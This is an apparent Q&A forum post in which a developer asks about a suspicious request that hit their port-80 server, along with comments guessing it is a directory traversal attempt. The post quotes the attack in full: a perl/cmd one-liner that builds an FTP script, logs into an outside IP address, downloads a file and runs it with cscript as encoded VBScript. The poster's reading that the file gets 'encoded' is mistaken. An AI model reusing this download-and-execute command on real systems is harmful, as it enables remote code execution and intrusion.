# Interesting HTTP request or attack

Tags: security, http, encoding, vbscript, httprequest

Some time ago I made a small program like SETI@home to generate the levels of a game that I'm working at. The program has a server and a client. They communicate on a port X using a simple protocol, and they use port 80 when the client is behind a HTTP proxy.

Having port 80 open, I receive a lot of weird HTTP requests. But two days ago one caught my attention:

```
{a few unreadable bytes that I dont know what they are}28{another byte}\perl.exe -esystem('cmd.exe /c echo open 222.91.160.59>f&echo 111>>f&echo qwe>>f&echo bin>>f&echo get one.zip>>f&echo bye>>f&ftp -s:f&cscript.exe /b /e:VBScript.Encode one.zip&del /f/q f&exit')
```

It makes a login file, connects via ftp to 222.91.160.59, downloads one.zip, disconnects, encodes with VBScript.Encode and deletes the file, right?

The questions:

- Any idea what those few bytes at the beginning are? I assume that the request is some kind of HTTP request since it was sent to port 80, but how would it work?. Unfortunately I couldn't recover those bytes because I've outputted them as a string, I didn't write them in a log... How is this weird request suposed to be executed in a HTTP server?
- The attack was not successful. I tried that evening to connect to the server, but it was closed. Yesterday, I found the server online and downloaded the file (with anonymous). I want to analyze it. Does anyone know how to decode it? I've never used VBScript.Encode, but I think that Encode either encodes/decodes and runs somehow one.zip, or the file uses a vulnerability in Encode or cscript.exe. Can someone guide me to analyze the file? I tried to base64 encode/decode it and even parts of it, but the result is unreadable.

If you want to see the beginning of one.zip, here you have a PNG: [Beginning of one.zip](https://i.stack.imgur.com/5brPN.png)

I assume that the .zip extension doesn't mean it is compressed, the author just put a random extension, since it is inputted directly to VBScript:Encode.

Thank you!

Comment: I'm not sure about off-topicness here. I'd say this might be a better fit over at [security](https://security.stackexchange.com/).

Comment: Belongs on [Information Security](http://security.stackexchange.com/).

Comment: Looks like it's trying to be a [directory traversal attack](https://www.owasp.org/index.php/Path_Traversal). It wants to trick your HTTP server into running a perl command by breaking out of the HTTP files.

Comment: If you'd have posted the bytes at the start, this would aid in us helping you. Percent encoding is the standard notation for printing special characters in URLs.